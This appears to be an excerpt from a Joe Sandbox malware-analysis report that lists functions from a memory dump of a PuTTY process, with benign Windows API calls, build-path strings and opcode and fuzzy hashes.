Opcode ID: e48a389622c1a57f6f0e7f198fe46d7a0a6f42d5bf4224c8216a7dd3bbb298e6
Instruction ID: 2a54ed73953264dea821e1f60521f581c7f2398c121754bb9545be6088444ace
Opcode Fuzzy Hash: e48a389622c1a57f6f0e7f198fe46d7a0a6f42d5bf4224c8216a7dd3bbb298e6
Instruction Fuzzy Hash: EF519771A447058FD724DF19E880BA6B7E2FFC0704F1A896CD5564B6A0EFB0F908CA91

Function 00BA1B3F Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000014), ref: 00BA1B56

Part of subcall function 00BA9B00: SetCaretPos.USER32(FFFFFFFF,FFFFFFFF), ref: 00BA9B32
Part of subcall function 00BA9B00: ImmGetContext.IMM32 ref: 00BA9B55
Part of subcall function 00BA9B00: ImmSetCompositionWindow.IMM32(00000000), ref: 00BA9B79
Part of subcall function 00BA9B00: ImmReleaseContext.IMM32(00000000,00000000), ref: 00BA9B85

DefWindowProcW.USER32(?,?,?,?), ref: 00BA3520

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ContextWindow$CaretCompositionInfoLocaleProcRelease
String ID:
API String ID: 2999936390-0
Opcode ID: 48dc3abbc0af515162c1383f84de00ba3cc8216874502da9cacf239e9524fba4
Instruction ID: ebfcb83f8e9327fe5912cf10657c270ead6f7303c075d40dba499bb6ca30801b
Opcode Fuzzy Hash: 48dc3abbc0af515162c1383f84de00ba3cc8216874502da9cacf239e9524fba4
Instruction Fuzzy Hash: ADF02772A442085BD7206B24AC56BAFB7D8BFD9311F04443BFA89C7241DD745906E7A1

Function 00BA83E0 Relevance: 3.0, APIs: 2, Instructions: 18windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 00BA83EB
ShowWindow.USER32(00000006), ref: 00BA8405

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: IconicShowWindow
String ID:
API String ID: 3061500023-0
Opcode ID: 7345d2c7e9f94f1f67c44fe6efc03b83c7cbafb7d6ec4308a8400debc6b76a43
Instruction ID: 921d5b98e4cfa052e0ce282585508bab4e05f04f6301e018f8e17f558c1ef8ba
Opcode Fuzzy Hash: 7345d2c7e9f94f1f67c44fe6efc03b83c7cbafb7d6ec4308a8400debc6b76a43
Instruction Fuzzy Hash: 1FD0177024D101ABFB111B38AD5876A6BE5EB1B340F0840A5B885C6A70DF268815E608

Function 00BB2D51 Relevance: 1.7, APIs: 1, Instructions: 210timeCOMMON

Download Yara Rule

APIs

GetCaretBlinkTime.USER32 ref: 00BB299A

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: BlinkCaretTime
String ID:
API String ID: 1096504186-0
Opcode ID: df5e09cac2da932f696229bb93a49f6f6a88c4d741d93c95fd62858f86973a8e
Instruction ID: 0a8abd3d829ccb4c0e7611b499df6039a589f8b5ab33f2bc7ad274b945514cea
Opcode Fuzzy Hash: df5e09cac2da932f696229bb93a49f6f6a88c4d741d93c95fd62858f86973a8e
Instruction Fuzzy Hash: 2A91C0709087408FD724CF38C4847EBBBE1EB86314F184DADE5AA572D2D7B5A884CB42

Function 00BB9500 Relevance: 1.7, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BB975E

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 690d11dcfd7c97eab9a2efa19cd9a67da38ac32fd14863018725a4eddc9d8c3f
Instruction ID: a9ddc12f4dd3a83c61ca4b66a6484f23a14eba06c17b27b2b9d162a2c47b237d
Opcode Fuzzy Hash: 690d11dcfd7c97eab9a2efa19cd9a67da38ac32fd14863018725a4eddc9d8c3f
Instruction Fuzzy Hash: 6C514CB4940B845BD3368B3498887F3FAD19F62314F1806AEE5EF83392D6B47590CB61

Function 00C65AE6 Relevance: 1.6, APIs: 1, Instructions: 116timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C56016: HeapFree.KERNEL32(00000000,00000000,?,00C590DA,?,00000000,?,?,00C58D7A,?,00000007,?,?,00C598A8,?,?), ref: 00C5602C
Part of subcall function 00C56016: GetLastError.KERNEL32(?,?,00C590DA,?,00000000,?,?,00C58D7A,?,00000007,?,?,00C598A8,?,?), ref: 00C56037

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00C65F7A,00000000,00BC5369), ref: 00C65B58

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3335090040-0
Opcode ID: 5064ef6a26c162e844fb19b18893a1702794cb58e8e2aa397533b8e640039aa6
Instruction ID: 8ba166f62fffa0cf1c06e283da7601b3ae18afd45e73d14d34e6495f0b6bd11d
Opcode Fuzzy Hash: 5064ef6a26c162e844fb19b18893a1702794cb58e8e2aa397533b8e640039aa6
Instruction Fuzzy Hash: 1031E571900615FBCB20BF65CC82B4E7B78EF46320F248066F515E71A1EB309A40EB95

Function 00C5A81E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00C55042: GetLastError.KERNEL32(?,?,00C479D8,?,?,?,?,00C4FBB7,00C4FB84,?,?,?,?,?,00C4FB84,?), ref: 00C55046
Part of subcall function 00C55042: SetLastError.KERNEL32(00000000,00C4FB84,?,?,?,?,?,00C4FB84,?,00000000,?,00000003,00C4348B), ref: 00C550E8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C5A872

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: beabd638d54b1e3e98135a22fb5e0994cb579b18a7b908b6bb0303979c444f17
Instruction ID: b5ed5d4f29c3a3023c0acf9f21b9389d8ffb0d9a11ad14f737e645b28e76e0f6
Opcode Fuzzy Hash: beabd638d54b1e3e98135a22fb5e0994cb579b18a7b908b6bb0303979c444f17
Instruction Fuzzy Hash: 3721D736610206ABDB289B26DC51B7A77ACEF44312F10417EFD01C7181EB34DD89EB55

Function 00C5A4D1 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00C55042: GetLastError.KERNEL32(?,?,00C479D8,?,?,?,?,00C4FBB7,00C4FB84,?,?,?,?,?,00C4FB84,?), ref: 00C55046
Part of subcall function 00C55042: SetLastError.KERNEL32(00000000,00C4FB84,?,?,?,?,?,00C4FB84,?,00000000,?,00000003,00C4348B), ref: 00C550E8

EnumSystemLocalesW.KERNEL32(00C5A56C,00000001,00000000,?,?,?,00C5A35B,00000000), ref: 00C5A543

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 1ec9371aaa2c714f58a6ae319ee7de4e4a35f06776825ad8c0f636c0c88a89e0
Instruction ID: 6fe6787a87097af9eeafb0f33ebee4a17f275944868a9e57c74d46773d06af1e
Opcode Fuzzy Hash: 1ec9371aaa2c714f58a6ae319ee7de4e4a35f06776825ad8c0f636c0c88a89e0
Instruction Fuzzy Hash: C411293B2007059FDB189F3AC891A7AB791FF80319B14453DED4787A40E371A987CB44

Function 00C5A93E Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00C55042: GetLastError.KERNEL32(?,?,00C479D8,?,?,?,?,00C4FBB7,00C4FB84,?,?,?,?,?,00C4FB84,?), ref: 00C55046
Part of subcall function 00C55042: SetLastError.KERNEL32(00000000,00C4FB84,?,?,?,?,?,00C4FB84,?,00000000,?,00000003,00C4348B), ref: 00C550E8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C5A992

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 7839c584e95fa9c322e56ea20e464ac4956c422637c9771d01cc94b5e8d19f48
Instruction ID: 0901e4ee820c36758d3aef8893cee8f2c06f349231c0186a52305d4399182c0e
Opcode Fuzzy Hash: 7839c584e95fa9c322e56ea20e464ac4956c422637c9771d01cc94b5e8d19f48
Instruction Fuzzy Hash: 31110636610117ABD728AB29DC52ABA73ECEF44311B10417AFD01D7241EB38ED48D755

Function 00C5AAEB Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00C55042: GetLastError.KERNEL32(?,?,00C479D8,?,?,?,?,00C4FBB7,00C4FB84,?,?,?,?,?,00C4FB84,?), ref: 00C55046
Part of subcall function 00C55042: SetLastError.KERNEL32(00000000,00C4FB84,?,?,?,?,?,00C4FB84,?,00000000,?,00000003,00C4348B), ref: 00C550E8

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00C5A788,00000000,00000000,?), ref: 00C5AB17

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 04c5c124ac66108fe76e9c3c9aba5f15d1ea3a5bc7e34726e9975bdd7b419b5c
Instruction ID: f961f97e10ace543c3fe34c3cb059a7989c2039c9675837b051e7f521eaf6899
Opcode Fuzzy Hash: 04c5c124ac66108fe76e9c3c9aba5f15d1ea3a5bc7e34726e9975bdd7b419b5c
Instruction Fuzzy Hash: 88F0F93A640115AFDB245A228C05BFA7766EB40355F144629EC16A3180EA74FE85C5D5

Function 00C5A7BF Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00C55042: GetLastError.KERNEL32(?,?,00C479D8,?,?,?,?,00C4FBB7,00C4FB84,?,?,?,?,?,00C4FB84,?), ref: 00C55046
Part of subcall function 00C55042: SetLastError.KERNEL32(00000000,00C4FB84,?,?,?,?,?,00C4FB84,?,00000000,?,00000003,00C4348B), ref: 00C550E8

EnumSystemLocalesW.KERNEL32(00C5A81E,00000001,?,?,?,?,00C5A31F,?), ref: 00C5A809

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 6685a1812418d4a8c5c6b3310b294ae939dfeac02f30b71911152aea0367bacf
Instruction ID: acbf089ac8a40442878b16f725268d9d5af123bb8d3d81a71c3359dbe2549030
Opcode Fuzzy Hash: 6685a1812418d4a8c5c6b3310b294ae939dfeac02f30b71911152aea0367bacf
Instruction Fuzzy Hash: 6BF0463A3003045FCB245F369881B7A7BA1EF80369F08813DFD028B680D6B19D82D754

Function 00C54EC5 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00C54FB3: EnterCriticalSection.KERNEL32(?,?,00C563A5,00000000,00CA1B50,0000000C,00C5635D,?,?,00C57BF7,?,?,00C551E0,00000001,00000364,?), ref: 00C54FC2

EnumSystemLocalesW.KERNEL32(00C54EB8,00000001,00CA1A50,0000000C,00C5461C,?), ref: 00C54EFD

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 8766e940234a3841eca88064be90c64bbf4ae7266fba4e559c61da78d7ed57b1
Instruction ID: 0f27041c8de46142551bf4456fbde2a37c69cd112e9789fd3deedf85d53d9452
Opcode Fuzzy Hash: 8766e940234a3841eca88064be90c64bbf4ae7266fba4e559c61da78d7ed57b1
Instruction Fuzzy Hash: 1DF0493AA44214DFDB04DF98E842B9CB7F0FB4976AF10812AF911DB2A0CB7549449F50

Function 00C5A8F3 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00C55042: GetLastError.KERNEL32(?,?,00C479D8,?,?,?,?,00C4FBB7,00C4FB84,?,?,?,?,?,00C4FB84,?), ref: 00C55046
Part of subcall function 00C55042: SetLastError.KERNEL32(00000000,00C4FB84,?,?,?,?,?,00C4FB84,?,00000000,?,00000003,00C4348B), ref: 00C550E8

EnumSystemLocalesW.KERNEL32(00C5A93E,00000001,?,?,?,00C5A37D,?), ref: 00C5A92A

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a42fa8e3a1b4a4dc2f62724463426b7a5c48f01d871a29a4473a06c3f249e99d
Instruction ID: b43d32031dcebfb719a82e50c0cff03db0d250ca451c65ee7e1944f2604092d5
Opcode Fuzzy Hash: a42fa8e3a1b4a4dc2f62724463426b7a5c48f01d871a29a4473a06c3f249e99d
Instruction Fuzzy Hash: 3AF0553E30020597CB049F36D81576ABFA0EFC1711B0B406EEE09CB280C2729987C794

Function 00BC4400 Relevance: 1.5, APIs: 1, Instructions: 27comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00C70784,00000000,00000001,00C70774,?,00000000,00BAB0D6), ref: 00BC441F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 25674b3698bd66825524a98c910339322dac6614000f345235da1e52a303d621
Instruction ID: b624ec21923cc198619f5b8bca476a860fd08e2838c5a894cb5add03bbfff4b5
Opcode Fuzzy Hash: 25674b3698bd66825524a98c910339322dac6614000f345235da1e52a303d621
Instruction Fuzzy Hash: CFF03974740200AFC608AB68DC8AF1937E4EF58B05F90446CF549CB290DAB1A811CB12

Function 00C54777 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00C4DBE5,?,20001004,00000000,00000002,?,?,00C4CAF8), ref: 00C547AB

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2114ed5786283a10da0043bffe218926b3b2fd28eea3909844aa302920382388
Instruction ID: a9361fb3ab9170568dd35314f6c273be3bbf656be8b5b2fc1671f0002af18734
Opcode Fuzzy Hash: 2114ed5786283a10da0043bffe218926b3b2fd28eea3909844aa302920382388
Instruction Fuzzy Hash: 06E04F36500218BBCF162F61DC09B9E7F29EF497A5F144025FD19A6121CB318DA1AA98

Function 00C10D20 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c, xrefs: 00C10D54

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c
API String ID: 0-3035396574
Opcode ID: 462eaeb945ca26efbfb5bc55515ae38a7e218c335e41a08ec3321a20ee6f5e7f
Instruction ID: 30e4b8b4f4ce6ac8b16eb3d0bcb9f624c62f0e3df5b7d50ef9e262b208f03b8d
Opcode Fuzzy Hash: 462eaeb945ca26efbfb5bc55515ae38a7e218c335e41a08ec3321a20ee6f5e7f
Instruction Fuzzy Hash: 2731E476A083088FD314EE51D84076AB7A1FBD6300F29842CE9995B341E6B1FD81DB91

Function 00C10C00 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c, xrefs: 00C10C35

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c
API String ID: 0-3035396574
Opcode ID: 795b3e229d36efc1fa1d48760bf7f5492d0d6cbb699af80745e62a69471cf40e
Instruction ID: 45677f7958bcfb2363fd08aebadad23ea871413bb4cf8105575ad4934ac1a971
Opcode Fuzzy Hash: 795b3e229d36efc1fa1d48760bf7f5492d0d6cbb699af80745e62a69471cf40e
Instruction Fuzzy Hash: 1631E376A043098FC320DE54D89076AB3A1FBCA304F298579E9995B341E7B1FD819FD2

Function 00C04A90 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

file format error, xrefs: 00C04A92

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID: file format error
API String ID: 0-2250856019
Opcode ID: 9bb332b9a8fba8480f6ead0e90ddd2b0e9326020f2db24afd206d5456fd8f8ab
Instruction ID: 7483bb841a7ab180e937a299f509c08e3d6cd68920886b07c6c758237896b05c
Opcode Fuzzy Hash: 9bb332b9a8fba8480f6ead0e90ddd2b0e9326020f2db24afd206d5456fd8f8ab
Instruction Fuzzy Hash: D9F059BA7C82080FCB3C1D5E6880BB3F399F713318E08107BE3A5422C0E1169D86E24E

Function 00BDB790 Relevance: .6, Instructions: 572COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2804403c51e157750d2287fcde7dd57b8ed0e5a056311132beea16f5df39e9
Instruction ID: 38f3a34d04077d5fb85a8098319c6a734fd674f6fe95bee64fedc124a0f6ac25
